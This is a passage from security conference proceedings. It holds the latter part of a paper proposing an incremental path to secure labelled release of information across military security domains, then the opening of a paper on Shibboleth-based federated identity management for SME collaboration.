Although sharing information may be a main means of NNEC, not all information has to be shared. It<br />

may not be relevant or useful, or it cannot be shared due to limitations other than security. In other<br />

words we must be able to make intelligent decisions on which information is eligible for sharing. For<br />

example one may wish to share a photo but due to bandwidth constraint it is only possible to share it<br />

in a resolution lower than 800x600 pixels. Software may then be used to automatically scale the photo<br />

if it is too large. Another example is to share all recent information objects for which the author is “Jan<br />

de Bruin” because he is one of the planners of an important and complex mission. Many more<br />

examples can be conceived from operational needs, such as: share feeds from sensors from a certain<br />

type like audio only, share images and videos made within a certain range of a GPS location to a<br />

team on a reconnaissance mission or based on keywords selecting which information is sent to such<br />

a mission. Or determine the communication system to use based on an urgency statement in a<br />

document. Depending on the granularity and type of the meta-information the possibilities are virtually<br />

endless.<br />

230


Harm Schotanus et al.<br />

2.3.1 Secure labelled release<br />

Meta-information can also be used to protect, i.e. ensure that information is not shared. For example<br />

do not share objects for which the meta-information says that the creation date is the current month.<br />

Or do not share videos with a resolution higher than 640x480. Or do not share presentation files<br />

which are classified ‘NATO CONFIDENTIAL’ or higher. We address a specific case where criteria that<br />

are suitable for determining the releasability to another domain are carried in meta-information bound<br />

to an information object as secure labelled release.<br />

2.3.2 Dissemination of release information<br />

Somewhere in the middle of duty-to-share and duty-to-protect is the usage to include metainformation<br />

to inform the recipient about any restrictions or responsibilities when processing or resharing<br />

the information. We address this by the moniker disseminating release information.<br />

These developments are not without consequences or certain security challenges. Especially in the<br />

areas of binding meta-information to information and protecting the integrity of (a) this binding, (b) the<br />

information and (c) the meta-information has to be carefully designed. When meta-information is used<br />

in a sharing mechanism and a user on a local workstation can create meta-information, then the<br />

(integrity of the) workstation and its components become critical because an insecure or untrusted<br />

operating system might trick a user into sharing the wrong information. The required level of<br />

assurance depends largely on the level of security that needs to be attained but is also affected by the<br />

specific application of meta-data.<br />

There must also be a fundament to build the meta-information on, such as a system to store and<br />

manage meta-information, retrieve the meta-information given the information itself or vice versa. And<br />

there are many other related challenges in handling data, e.g. how to handle to conflicting sets of<br />

meta-information, how can meta-information be revoked or changed, and so on. These issues need to<br />

be addressed in an information management system 1 .<br />

3. Labelling: An incremental approach<br />

In the previous section we have seen that labelling has manifold purposes. The emphasis has mostly<br />

been on secure labelled release for exchanging information across different security domains. We<br />

propose an incremental approach in which partially related developments are tied together so that<br />

functionality enabled by labelling can be realised step-by-step. This has two main advantages. One, it<br />

will make the development process better organised and hence can be more efficient and costeffective.<br />

Second, users and organisations can benefit from labelling directly because the new<br />

functionality can be used as soon as the step is completed. This is also beneficial for the userexperience.<br />

To achieve this incremental approach, a clear overview is needed of which steps must be taken to<br />

realise each of the intermediate functionality whilst ensuring that the ultimate goal, which is also the<br />

most complex, can still be reached. In this section we propose a plan to achieve the secure labelled<br />

release in a series of smaller, incremental steps that add useful functionality to existing or new<br />

processes. We distinguish four phases:<br />

1. Information lifecycle management<br />

2. Disseminating cross-domain information<br />

3. Integrity protection<br />

4. Secure labelled release.<br />

3.1 Information lifecycle management<br />

In this context, labelling functionality is used to improve information management within a single<br />

information domain. A user may add additional meta-information to an information object, such as the<br />

author, title, publication date, classification – the possibilities are virtually endless. This enables<br />

various management functionality to be used on the document as discussed in Section 2, including<br />

archiving, searching, and deleting information.<br />

1<br />

An information management system comprises more aspects than a content management system that is merely a container<br />

to store and share information within a single domain.<br />

231


Harm Schotanus et al.<br />

The security requirements are minimal, as the binding between the document and the label is weak at<br />

this point. Basically the label only needs to contain a reference to the original document. Within an<br />

information domain, it could be used for enforcing need-to-know separation or communities of<br />

interest. Figure 2 shows an abstraction of the functionality needed for this approach.<br />

Labelling<br />

application<br />

Workstation<br />

Labels and<br />

documents<br />

Information<br />

management<br />

system<br />

Figure 2: Labelling for information lifecycle management purposes<br />

Essentially, the architecture for this set-up contains only two main aspects:<br />

An application that can create labels.<br />

An information management system: an environment or system that can be used to store<br />

information and labels together.<br />

When a user creates information, the labelling application can be used to link several attributes to the<br />

information. The information and the label will both be stored in the information management system<br />

(IMS). The user may disseminate the information either through the IMS or by separate means. The<br />

IMS can in the latter case be used to retrieve the label, when the information is presented.<br />

3.2 Disseminating cross-domain information<br />

We can extend the information lifecycle management functionality so that it is possible to inform a<br />

recipient of information in another information domain about the way the information should be<br />

treated; e.g. under what memorandum of understanding it is exchanged or what classification is<br />

attached to the information. In this case when a user sends the information to a recipient, the label<br />

with the necessary meta-information has to be sent as well. This purpose is mostly intended of<br />

information-sharing across different information domains, where each information domain has the<br />

same or a very similar security policy. The label here has an informative, procedural aim and does not<br />

necessarily form a technical enforcement.<br />

Labelling<br />

application<br />

Workstation<br />

Labels and<br />

documents<br />

Document<br />

Information<br />

management<br />

system<br />

Figure 3: Labelling for disseminating cross-domain information<br />

232<br />

Label<br />

Release<br />

mechanism


Harm Schotanus et al.<br />

In this setup we add a third element, namely the release mechanism. Essentially, the other elements<br />

stay the same. This release mechanism has a two-fold purpose. The first is to verify that a suitable<br />

label accompanies the information and if not, try to retrieve the label from the information<br />

management system. The suitability is established by validating that all the necessary information is<br />

present. The second purpose is the ability to translate an internal label to an external label. For<br />

example certain elements may be removed from the document (such as the name of the author) or<br />

other information may be added (e.g. the date of information exchange), or a different labelling<br />

structure may be used for internal and external purposes 2 .<br />

3.3 Integrity protection<br />

The third step in extending the labelling architecture is to realise integrity protection of information.<br />

Integrity protection refers to the means to establish whether a document is authentic or has been<br />

changed. And as a secondary benefit, it may be established who assessed the authenticity.<br />

The label has to be extended to include a secure binding to link the information and the label together,<br />

in such a way that it can always be detected if an existing label is attached to other (different or<br />

altered) information, or if the label content has been changed. Making a change to an information<br />

object can be detected because that would result in a different object.<br />

For the binding to be secure we need cryptographic support. A method, amongst others, of realising<br />

this is through a PKI. A user has to use a private key to sign the binding in the label, which links the<br />

binding also directly to the user. That is, it can easily be determined who created the label. To validate<br />

the integrity of the document, the public key of the user that created the binding can be used to verify<br />

the binding in the label. In case any changes have been made, the verification will fail.<br />

Certificates<br />

and CRL<br />

Labelling<br />

application<br />

Trusted OS<br />

Workstation<br />

Labels and<br />

documents<br />

PKI<br />

Document<br />

Information<br />

management<br />

system<br />

Label<br />

Release<br />

mechanism<br />

and IEG<br />

Figure 4: Labelling for integrity protection<br />

For a high assurance environment 3 , we also need to ensure that the labelling process works correctly.<br />

In other words we must have a level of assurance that the information the user actually labelled is the<br />

correct information and has not been modified unbeknownst to the user during the process. We<br />

cannot attain that level of assurance on a normal platform (operating system); therefore we need an<br />

operating system or platform that can provide us the needed assurance. This has been named a<br />

trusted operating system. Essentially, each step in the process of labelling must be carried out under<br />

2 Note that the release mechanism does not comprise the entire interconnection here, there may be other elements needed too,<br />

for instance cryptographic units or firewalls to ensure a secure connection.<br />

3 For instance information domains which process highly classified information.<br />

233


Harm Schotanus et al.<br />

conditions that are guaranteed by the operating system, but on the other hand a user must also be<br />

capable of performing his regular tasks on the same platform. We see opportunities to establish this<br />

based on a virtualisation layer on top of a minimal, but trusted core operating system. One virtual<br />

machine will comprise normal functionality and a second will form the labelling application with strict<br />

limitations, this concept is further elaborated upon in (Verkoelen 2010).<br />

An architecture of a workstation that is suitable for creating labels in a trusted manner, is shown in<br />

Figure 5 (Hartog 2010). In essence, this is a virtualisation platform with two virtual machines. One is<br />

used as a workstation with the common applications. The other is used specifically for labelling which<br />

is focussed on binding a label to a given information object in such a way that the process cannot be<br />

disrupted and assurance can be given that only the provided information object is labelled and<br />

nothing else. The information to be labelled has to be exported from the generic to the specific virtual<br />

machine where a label can be created. Then the label can be transferred back to the workstation.<br />

Workstation<br />

Desktop<br />

Labelling<br />

High Assurance<br />

Platform<br />

Hardware<br />

Figure 5: Architecture of a workstation for trusted labelling<br />

The needed level of assurance is created by a high assurance platform. The core component<br />

therefore can be a separation kernel (Rushby 1981)(Information Assurance Directorate 2007), which<br />

is in control of all resources in the system and all communication between the virtual machines. The<br />

virtualisation is layered on top of the HAP. In certain cases with high assurance requirements, specific<br />

hardware requirements may have to be used, but mostly it can be based on generic hardware.<br />

3.4 Secure labelled release<br />

The final objective of this incremental approach is the secure labelled release. The label can then be<br />

used to validate the suitability of exchanging a document across different security domains where the<br />

security policies of the domains may be different. The suitability is determined by different metainformation<br />

stored in a protected label. This could for example refer to the classification of the<br />

information in the document, but may also refer to capabilities of the source of the information<br />

(Smulders 2010),such as the quality of the camera used to take an aerial photograph, or the range of<br />

radar. And of course combinations are also possible. The validation takes place at the border of the<br />

information domain. The label is intended for internal usage, and does not have to be included after<br />

the information has been released. However, it is also a possibility to translate the label to use as in<br />

the case of “Disseminating release information”.<br />

To extend the integrity protection set-up to a full secure labelled release setup we have to add an<br />

extended release mechanism. This extension is twofold. In the first place the release mechanism<br />

must be capable of integrating with the PKI to validate the authenticity of the label and match it<br />

against the document. The release mechanism has to validate the certificate of the user that created<br />

234


Harm Schotanus et al.<br />

the label (by way of for example a CRL) and ascertain the integrity of the document so that it can be<br />

established that the label matches the document and the label is valid.<br />

Labelling<br />

application<br />

Trusted OS<br />

Certificates<br />

and CRL<br />

Workstation<br />

Labels and<br />

documents<br />

PKI<br />

Document<br />

Information<br />

management<br />

system<br />

Label<br />

CRL<br />

Release<br />

mechanism<br />

Trusted OS<br />

Figure 6: Secure labelled release<br />

In the second place, since the release mechanism is now a security device that mediates between<br />

different security domains, it is necessary to raise the assurance of the correct behaviour of this<br />

platform. Therefore it is necessary to introduce a trusted platform for this element as well. In contrast<br />

to what is needed on the workstation, this system is dedicated to a single task and hence, the<br />

operating system only has to ascertain the correct working of that platform and thus this is a different<br />

form of a trusted OS.<br />

To determine whether the document is suitable for release the contents of the label have to be<br />

matched against a policy; each of the criteria in the label may affect the decision of the release<br />

mechanism. A simplified policy could for example be “all documents with a classification of<br />

Unclassified or NATO Restricted may be released”; and “all images with a resolution less than<br />

800×600 may be released”. A real policy may actually be quite complex to establish. Important issues<br />

are establishing the completeness and consistency of the release policy.<br />

3.5 Functional building blocks<br />

This chapter has shown four situations in which meta-information encapsulated in a label added<br />

useful functionality to existing or new processes. For these different applications we have shown the<br />

necessary functional building blocks needed to realise them. This section provides an overview of the<br />

relation between the different applications and functional building blocks and also shows the essential<br />

components within each functional building block.<br />

Figure 7 provides an overview of the relation between the different applications and functional building<br />

blocks. From the left to the right the figure describes an incremental approach to obtain more complex<br />

application functionality with the use of the functional building blocks discussed in Section 3. We<br />

distinguish four basic building blocks:<br />

A labelling mechanism that can be used to construct meta-information.<br />

A release mechanism that controls under which conditions information can be shared with other<br />

domains.<br />

A trusted OS to attain the required level of assurance.<br />

A PKI to ascertain the binding between the label and the information object.<br />

235


Labelling<br />

Label creation<br />

Information lifecycle<br />

Management<br />

Release mechanism<br />

Labelling<br />

Verification<br />

Label translation<br />

Label creation<br />

Disseminate<br />

release information<br />

Harm Schotanus et al.<br />

PKI<br />

Labelling<br />

Trusted OS<br />

CA<br />

Smartcard auth.<br />

Certificate Valid<br />

Secure binding<br />

Label translation<br />

Label creation<br />

…<br />

Secure login<br />

HAP<br />

Integrity<br />

protection<br />

PKI<br />

Release mechanism<br />

Labelling<br />

Trusted OS<br />

CA<br />

Smartcard auth.<br />

Certificate Valid<br />

Certificate valid<br />

Authorisation<br />

Verification<br />

Secure binding<br />

Label translation<br />

Label creation<br />

…<br />

Secure login<br />

HAP<br />

Secure labelled<br />

release<br />

Figure 7: An incremental approach to introduce labelling<br />

Each functional building block can consist of several components which have to be implemented<br />

depending on the functionality we require. When these requirements increase additional functional<br />

building blocks are required and the complexity of the building blocks may increase as more<br />

components are added. As such we have established an incremental approach in which we add<br />

complexity in small steps but in the mean time we create new useful functionality.<br />

The first basic step to use labelling is to implement a system which can create labels and utilise these<br />

labels in an (existing or new) Information Management System to manage information. When all the<br />

processes and procedures are in place and people are used to work with this new form of information<br />

management it can be decided to extend the labelling with more functionality. A next step can be to<br />

implement a release mechanism which can decide to translate internal labels into external labels and<br />

share these labels with other domains. To ensure the integrity of the data-object and metadata-object<br />

PKI and Trusted OS functionality can be added. At the end all four functional building blocks are in<br />

place resulting in a “secure labelled release” application.<br />

Each step goes along with other advantages such as reduced complexity, people have time to<br />

experience and use new functionality, processes and procedures will change incremented and an<br />

better acceptance of the functionality in the organisation.<br />

4. Conclusion<br />

Labelling is an important step to provide the technical means to realise a NEC environment and<br />

implement a duty-to-share mechanism. Not only does it allow the sharing of information, it also<br />

realises a basis so that the information owner can remain in control of which information is shared.<br />

Creation of labels in itself is not a difficult process, nor is the validation of the correctness of such a<br />

label. Most of the means for these are already in place e.g. in the form of PKI. Assurance is a totally<br />

different criterion. To attain the right level it is vital to ascertain that the label is attached correctly to<br />

the right information. Hence it requires many additional controls to achieve that certainty. Crucial in<br />

that aspect is the choice of a platform as this is the basis for assurance.<br />

Implementing labelling for a high security environment is a costly and long-term development. But in<br />

the long run, it can also be a very useful technique to create a solution to exchange information<br />

across different security domains. But on the short term, obtaining results is difficult. However,<br />

encapsulating meta-data in a label can be useful for many other purposes as well. We argued that<br />

236


Harm Schotanus et al.<br />

these aspects can be combined to develop a labelling solution that in the end delivers a cross domain<br />

solution, but in the mean time can be useful for several purposes. We have provided a proposition for<br />

an incremental approach to create a cross domain solution.<br />

By starting with labelling for information management purposes, we can quickly gain results as it can<br />

make accessing the right information easier. This can be extended with limited effort to support a<br />

method to exchange release information with other domains having a similar security policy. This way,<br />

not only have we provided the technical basis for labelling, but also have we prepared the users to<br />

work with labels and appreciate their purpose. The third step in this process can be to implement<br />

integrity protection and this requires an elevation of the assurance of the label creation process. And<br />

finally we reach a true cross domain solution if we elevate the assurance on the validation side as<br />

well. It can be easily spotted nevertheless that careful planning and a solid overview of each individual<br />

step as well as the whole is a necessity to reach the goal. On the other hand, implementing a cross<br />

domain solution in one big step may be just a bridge too far.<br />

5. Future work<br />

The proposed means to realise a cross domain solution can be further extended with other<br />

functionality. These require further research to determine feasibility and technical means to realise<br />

them.<br />

Fine-grained control over information, e.g. labels on individual chapters or paragraphs.<br />

Automatic labelling of information; for instance information from sensors, such as radar or<br />

cameras can be automatically labelled, depending on both the content as well as the capabilities<br />

to generate the information.<br />

Integration of applications and labelling, so that the user can control the process of labelling<br />

(semi-)automatically from the applications.<br />

Life cycle management of information, e.g. use of labels to express changes in the information.<br />

Cross Domain Solutions; it can be a very useful technique to use different labels to exchange<br />

information across different security domains. Based on a domain policy external labels can be<br />

translated into an internal label which is understandable within the domain.<br />

Methodology for policy development. A core concept of an automate release mechanism is<br />

enforcing a policy; creating a usable policy is a complex task, hence a methodology to develop<br />

based on all rules and agreements is needed to ensure the completeness and consistency.<br />

6. References<br />

Buckman, T. (2005) “Nato Network Enabled Capability Feasibility Study – Executive Summary”, [online] version<br />

2.0, NC3A, http://www.dodccrp.org/files/nnec_fs_executive_summary_2.0_nu.pdf<br />

Schotanus, H.A., Boonstra, D. and te Paske, B.J. (2009) “Information Labeling – Cross- Domain Solutions”,<br />

Intercom Vereniging Officieren Verbindingsdienst, 38 th year, No. 2<br />

Martis, E.R., et al. (2006) “Information Assurance : Trendanalysis”, TNO report TNO-D&V 2006 B312<br />

Eggen, A., et al. (2010) “Binding of Metadata to Data Objects – A proposal for a NATO specification”, Norwegian<br />

Defence Research Establishment (FFI) & NC3A<br />

Hartog, T., Degen, A.J.G. and Schotanus, H.A. (2010) “High assurance platform for labelling solutions”, TNO<br />

Information and Communication Technology<br />

Rushby, J. (1981) “Design and Verification of Secure Systems”, ACM Operating Systems Review, Vol. 15, No. 5,<br />

pp 12-21, http://www.csl.sri.com/papers/sosp81/sosp81.pdf<br />

Smulders, A.C.M. (2010) “Rubriceren bottleneck voor informatiedeling”, Intercom Vereniging Officieren<br />

Verbindingsdienst, 39 th year, No. 1, p 33-34<br />

Verkoelen, C.A.A., et al. (2010) “Security shift in future network architectures”, information assurance and cyber<br />

defence; NATO RTO IST 091<br />

Information Assurance Directorate (2007), “U.S. Government Protection Profile for Separation Kernels in<br />

Environments Requiring High Robustness”, version 1.03, http://www.niapccevs.org/pp/pp_skpp_hr_v1.03.pdf<br />

Oudkerk, S., et al. (2010) “A Proposal for an XML Confidentiality Label Syntax and Binding of Metadata to Data<br />

Objects”, information assurance and cyber defence, NATO RTO IST 091<br />

W3C, POWDER: Protocol for Web Description Resources, 1 september 2009, http://www.w3.org/2007/powder/<br />

237


Information Management Security for Inter-Organisational<br />

Business Processes, Services and Collaboration<br />

Maria Semmelrock-Picej 1 , Alfred Possegger 2 and Andreas Stopper 2<br />

1<br />

eBusiness Institute, Klagenfurt University, Austria<br />

2<br />

Infineon IT-Services GmbH Austria, Austria<br />

Maria.Semmelrock-Picej@aau.at<br />

Alfred.Possegger@infineon.com<br />

Andreas.Stopper@infineon.com<br />

Abstract: Web-based collaborations and cross-organizational processes typically require dynamic and contextbased<br />

interactions between involved parties and services. Due to temporary nature of collaboration and an<br />

evolving of competencies of involved companies over time security issues like trust, privacy and identity<br />

management are of a high interest for a long lasting success of virtual collaborations This paper adresses this<br />

issue by presenting some results of an international research project. The vision of this project is to implement a<br />

virtual cooperation system for SMEs to be used for realizing competitive advantages through virtual cooperations.<br />

The paper describes some results of this system. Especially we will discuss issues concerned with identity<br />

management. Identity Federation is one of the key concepts of SPIKE to support “virtual organizations”, their fast<br />

setup, comfortable maintenance and orderly closing. This paper describes the mechanisms from which<br />

collaboration partners, registered at the SPIKE platform, will be authenticated by using a standardized identity<br />

federation protocol – Shibboleth. It is shown how the identity data of a company, using its own IDMS, can be<br />

integrated into the SPIKE platform and what a company has to setup from a technical point of view so that its<br />

employees can be authenticated via Shibboleth. Further an approach is presented suitable for mostly SMEs<br />

which do not have an own IDMS.<br />

Keywords: eCollaboration, security, identity management, phases of cooperation<br />

1. Introduction<br />

Nowadays competition is no longer between single enterprises but among supply chains with numerous<br />

actors. Effective supply chain management has therefore become a potentially valuable way of<br />

securing a competitive advantage and improving organizational performance. Firms are seeking<br />

synergistic combinations of resources and changing their roles and value positions through digital<br />

collaborations (Klein, Rai and Straub 2007). However the understanding of the how and which areas<br />

are most important for the success is still incomplete.<br />

It has been noted in literature that information and communication technologies have a significant<br />

impact on the economic situation and knowledge based activites in peripheral regions. Especially for<br />

SMEs in the cross-border region Carinthia and Slovenia (Ziener 2010) identified a low rate of<br />

internationalization, a small amount of crossborder supply chain networks and activities limited to<br />

regional borders.<br />

ICT support collaboration among people with different competencies and capabilities in virtual<br />

collaborations (Mohrmann et al. 2003), facilitate knowledge access and sharing (Davenport and<br />

Prusak 1998) and enable the codification and dissemination of explicit knowledge (Zack 1999). Virtual<br />

collaboration also increases the knowledge about who knows what, enabling virtual joint work and<br />

supporting easier and fast setup of short-term project based and loosely coupled chains among<br />

participants. In doing so, studies have analyzed that a participation of small and medium sized<br />

enterprises in eCollaboration environments could improve their situation in peripheral regions.<br />

However, despite the general agreement on the positive impacts of virtual collaborations, detailed<br />

micro level evidence on the preconditions and success is limited. Yet it has been analysed, that the<br />

way SMEs interact in collaborative environments depends to a big extent on the security<br />

functionalities and management which impact on almost all knowledge-related activities as a basic<br />

precondition. In other words, existing work typically narrows to very specific processes or activities.<br />

This contribution emphasizes the potential capability of ICTs and their fundamental role to create a<br />

virtual dimension through which companies can share and create new knowledge at both tacit and<br />

explicit level.<br />

Companies have a serious privacy concern about how their information is used, disclosed and<br />

protected and the degree of control they have over the dissemination of the information. Especially<br />

238


Maria Semmelrock-Picej et al.<br />

they are concerned about possible undesirable economic consequences resulting from a misuse of<br />

such information. Indeed, many companies express concern about the privacy and identity<br />

management and research suggests that identity management is of focal concern to companies.<br />

Identity Management is a hot area, experiencing considerable growth and gets more and more one of<br />

the challenging key disciplines an IT department of a midsize to large enterprise has to ise (Jackson<br />

2010). It is not surprising because organizations, supply chains and customers have been tightly<br />

connected together in digital networked economy. Another important aspect is that of identity theft<br />

and misuse, leading to serious damages within enterprises and also in the Internet development.<br />

The major contribution of this paper is in revealing and discussing the identitiy federation approach<br />

that impact trust in collaborative environments. In doing so, this paper shows, based on the<br />

standardized Shibboleth protocol, how the identity data of a company can be integrated, when taking<br />

part in collaborations. The second contribution of this paper is in identifying the requirements of<br />

smallest companies in this field. When talking about these issues in an enterprise context mostly midsize<br />

to large enterprises are in the focus of consideration. This paper presents solutions which bridge<br />

this gap by offering the necessary functionality also to smallest companies. These findings should<br />

enhance very small companies to also start collaborating virtually.<br />

2. The SPIKE project<br />

2.1 Introduction<br />

SPIKE as a virtual infrastructure aims at researching and implementing a virtual collaboration<br />

platform. In order to reach these goals SPIKE’s security infrastructure is highly reliable and adaptive<br />

and consists of the following layers (see next figure), (Semmelrock-Picej and Possegger 2010):<br />

A: Network Enterprise Layer – at level A different companies offer their particular tacit and explicit<br />

knowledge, expertise, resources and skills. All involved companies are characterized by a number<br />

of criteria like strategic position, size of company, market, location, and so on.<br />

B: Conceptual SPIKE Layer: The Service Mediatior of this layer combines all provided tangible<br />

and intangible resources and coordinats them accordingly to the requirements of the market<br />

which than form a new product (see figure 1 B).<br />

Level B also consists of mapping instruments to assign involved companies and their services and<br />

capabilities to the tasks of the business process. This layer particularly supports the selection,<br />

orchestration, management and execution several kinds of services in a controlled way.<br />

2.2 Security functions in SPIKE<br />

In participating the SPIKE platform companies/users first name their identity. The system validates the<br />

user’s claimed identity (authentication). Both steps precede access control which aims at preventing<br />

unauthorized use of a resource as well as use of resources in an unauthorized way.<br />

As identities in virtual cooperations are not anonymous trust and reputation mechanisms are the key<br />

to success of open, dynamic and service oriented virtual collaborations as they lead to social trust of<br />

involved persons in virtual cooperations and are therefore the best strategy to ensure virtual<br />

cooperation. However, this trust is based on repeated interactions wich can be successful or fail.<br />

Therefore a key aspect of our approach is the permanent process of the analysis and evaluation of<br />

interactions which automatically determine trust.<br />

In the last years trust has mostly been connected and analysed in combination with technical security<br />

issues. Based on this several definitions has been developed (Josang, Ismail and Boyd 2007; Artz<br />

and Gil 2007). For our discussion we understand trust more human centric which relies on previous<br />

interactions and improves human collaboration supported with technical systems in a virtual environment.<br />

For this communication is the basis for directly influencing trust between individuals in business<br />

collaborations (Economist 2008) and relies on the experiences of previous interactions (Billhardt,<br />

Hermoso, Ossowski and Centeno 2007; Mui, Mohtashemi and Helberstadt 2002) and the similarity of<br />

interests and skills (Matsuo and Yamamoto 2009). In addition especially in social networks and<br />

collaborations trust is strongly related to information disclosure, identity management and privacy and<br />

can also be used as a basic model to improve document recommendations to better match interests<br />

of users.<br />

239


Maria Semmelrock-Picej et al.<br />

Figure 1: Creation of dynamic value chains for eCollaboration<br />

This paper emphasizes on Federated Identity Management which is based on trust. (Fuchs and<br />

Pernul 2007) define the environment of an Identity Management system as an integrated,<br />

comprehensive framework which is based on three pillars: policies, processes and used technologies.<br />

Identity Management processes deal with user management, organisational as well as technical<br />

approval workflows, and escalation procedures. They form the main administrative workload as they<br />

comprehend the management of the whole user lifecycle. In order to regulate identity related<br />

information flows and processes, policies have to be defined. For example, policies express<br />

regulations for user management processes, delegation issues or general security requirements. The<br />

third pillar technologies can be subdivided in the following three main components:<br />

Directory services provide synchronised information about users and resources forming the<br />

foundation of a comprehensive identity management infrastructure.<br />

240


Maria Semmelrock-Picej et al.<br />

User management deals with the process of managing digital identities throughout their lifecycle,<br />

starting with the creation of accounts, maintenance, i.e. by processing change requests, up to the<br />

deactivation or termination.<br />

Access management deals with the authentication and authorisation of users, controlling access<br />

to connected resources.<br />

2.3 Identity management architecture<br />

First of all, the term Identity Management needs to be discussed in detail. Within the SPIKE project<br />

we have to distinguish when thinking of Identity Management. Companies manage the digital<br />

identities of their users in their IDM systems what is called in-house IDM. When those identities are<br />

used in an inter-organisational manner, we speak about federated IDM. The federated IDM system of<br />

SPIKE is based on Shibboleth. Shibboleth is needed to make use of the digital identities in an interorganisational<br />

context, i.e. the identity information of User A from Company A is used to access<br />

Resource X managed by Company Y. Shibboleth mainly consists of three components: the Where<br />

Are You From Service (WAYF), the Shibboleth Service Provider (Shib SP) and the Shibboleth Identity<br />

Provider (Shib IdP).<br />

SPIKE requires connecting to an existing IDM system of the collaborating companies. Thereby the<br />

already existing digital identities can be used in an interorganisational manner. However, the SPIKE<br />

project targets on organisations of all sizes, from small- and medium-sized enterprises to large<br />

organisations. Large organisations and many medium-sized companies usually run their own IDM<br />

systems, but small and sometimes medium companies as well do not operate an IDM system.<br />

Therefore, SPIKE must distinguish between those two cases (Companies without an IDMS and<br />

companies with IDMS).<br />

Figure 2 shows the generic Identity Management architecture of SPIKE. The figure is reduced to IDMrelevant<br />

components to describe the basic idea of SPIKE’s IDM. SPIKE considers both – companies<br />

running their own IDM solutions as well as enterprises without an IDM system.<br />

Figure 2: SPIKE IDM architecture<br />

In Figure 2, Company A for instance represents a small enterprise employing only a handful of<br />

persons. Therefore they might not have a comprehensive IDM system which is required to participate<br />

in virtual alliances operated by SPIKE. To enable such companies being part of an online<br />

collaboration, SPIKE runs its own IDM solution and thereby covers this existing lack. Therefore, the<br />

SPIKE platform has its own Shibboleth IdP installed which is connected with SPIKE’s IDM solution.<br />

The SPIKE Shibboleth IdP is registered on the SPIKE WAYF service. The IDMS of SPIKE can be<br />

accessed via the SPIKE portal.<br />

241


Maria Semmelrock-Picej et al.<br />

Company B, on the other hand, represents all enterprises running their own IDM systems. Those<br />

companies have to install and configure the Shibboleth IdP software on the IT systems within their<br />

company and connect their IDM solution appropriately. Furthermore the Shib IdPs have to be<br />

registered and connected with the SPIKE WAYF service. Such companies do not need SPIKE’s<br />

IDMS.<br />

In the following, two sequence diagrams show the general procedure for connecting an external IDMS<br />

to SPIKE as well as making use of SPIKE’s integrated IDM solution on a high level basis. The shown<br />

diagrams are reduced to IDM-related steps.<br />

Figure 3 represents the high-level procedure for connecting an external IDMS with the SPIKE<br />

platform. Firstly an administrator of the collaborating company has to install and configure the<br />

Shibboleth IdP software (1). After that a connection between the companies’ IDMS and the Shibboleth<br />

IdP needs to be set up by registering the IDMS (2). According to the required attributes of SPIKE and<br />

the respective resources provided by the alliance partners the administrator of the company can<br />

assign attributes to the involved digital identities (3). The attributes required to access a resource<br />

provided by a service provider are defined during the configuration phase of the SP [D7.2b]. After the<br />

project has finished all connections are disabled and Shibboleth IdP will be uninstalled (4).<br />

Figure 3: Connecting external IDMS with SPIKE<br />

Figure 4 shows a high-level procedure for using SPIKE’s IDMS.<br />

Figure 4: Using SPIKE IDM system<br />

In order to make use of SPIKE’s IDMS, firstly the SPIKE administrator has to create a respective user<br />

account equipped with sufficient access rights and attributes for the responsible user of the particular<br />

company (1). The administrator of company N establishes the needed digital identities in the IDMS of<br />

242


Maria Semmelrock-Picej et al.<br />

SPIKE. Attributes will be assigned respectively, according to the required attributes of SPIKE and the<br />

resources provided by the partners. When an employee leaves the project or the company or the<br />

project ends, the company’s admin destroys those digital identities (2). Within the third step the<br />

SPIKE administrator will delete the admin account of the respective company after finishing the<br />

collaboration project (3).<br />

By means of the IDM solutions – either the companies’ own IDM or SPIKE’s IDM – the collaboration<br />

partners can manage their users and respective attributes by themselves and thereby allow for the<br />

paradigm of federated identity management..<br />

2.4 Evaluation of the applicability of potential solutions for identity management<br />

architecture<br />

In this section a brief introduction on the topic of the applicbility of potential solutions is given whereas<br />

two potential solutions, Apache DS and OpenLDAP, are compared and evaluated against the<br />

requirements defined in section 2.2.:<br />

Table 1 shows a comparison between Apache DS and OpenLDAP based on the requirements for<br />

SPIKE’s integrated IDMS defined in section 2. Both solutions fulfill the defined requirements if<br />

respective admin-GUIs are used in addition. However, during the test phase we also recognized<br />

some minor differences leading to our decision described in the following.<br />

Table 1: Comparison between Apache Directory Service and Open LDAP<br />

Identity Management processes mainly deal with user management and security policies. Apache<br />

Directory Server in conjunction with its corresponding administration tool Apache Directory Studio<br />

offers the possibility to create, delete, and change user accounts and attributes. Thus, the user can be<br />

administrated via Apache Directory Studio. Apache DS itself does not provide an Admin-GUI by<br />

default. Apache DS also covers the three main components of technologies: directory services, user<br />

management and access management. Furthermore it is possible to monitor and log all carried out<br />

actions in order to comply with any kind of legal obligation or regulation. Apache DS also enables the<br />

definition and application of policies. For instance, policies for the quality of a user password in terms<br />

of the string length, the usage of special signs, etc. can be defined.<br />

Summarizing, Apache DS and OpenLADP fulfill all defined requirements, support auditing<br />

functionality and require a separate tool for administration.<br />

In the following a special application case will be presented and we start with the discussion of the<br />

user requirements.<br />

243


Maria Semmelrock-Picej et al.<br />

3. Application case identity federations<br />

3.1 User requirements<br />

Prior to the introduction of the Identity Management System (IDMS) in 2005, access information on<br />

file shares, computers and accounts was distributed to several systems like Active Directory, SunOne<br />

and other applications. Those systems worked independently and there was no mechanism available<br />

to guarantee consistent data (e.g. departments, cost center, phone numbers and names of persons),<br />

based on the delivery from designated master systems, throughout the different systems deployed in<br />

the company. Thus, helpdesk support was required frequently.<br />

Therefore Infineon introduced the IDMS to have a mechanism at hand to collect data from different<br />

master systems, combining the necessary data to digital identities and distribute and enforce this<br />

identity information consequently throughout different directory services and applications. In order to<br />

improve the IDMS and to save the ROI, an automatic user provisioning system and RBAC has to be<br />

set up in a next step.<br />

The major function of provisioning is once a new identity enters the IDMS from the global HR system,<br />

an automatic workflow is triggered to its manager based on certain attributes (like location and<br />

manager information). The respective manager chooses the respective roles for the new employee<br />

and dependent on the request the necessary access to resources (accounts, groups, group<br />

memberships) is set by the IDMS (mostly no human interaction is necessary anymore). Thus, during<br />

the life cycle of the identity roles are added and removed and once an employee leaves the company<br />

access to his resources will be disabled completely. The last case is also called de-provisioning. A<br />

basic approach for provisioning (without a portal- and workflow solution) was developed and<br />

implemented at Infineon in 2007. The results are shown in (Obiltschnig 2007).<br />

Another issue which cannot be tackled exclusively by a centrally-organized IDMS is the collaboration<br />

with external partners. This topic has been deeply researched for more than two decades. Already<br />

started in the mid of the 1980s, research in this area is still ongoing. Wellknown and representative<br />

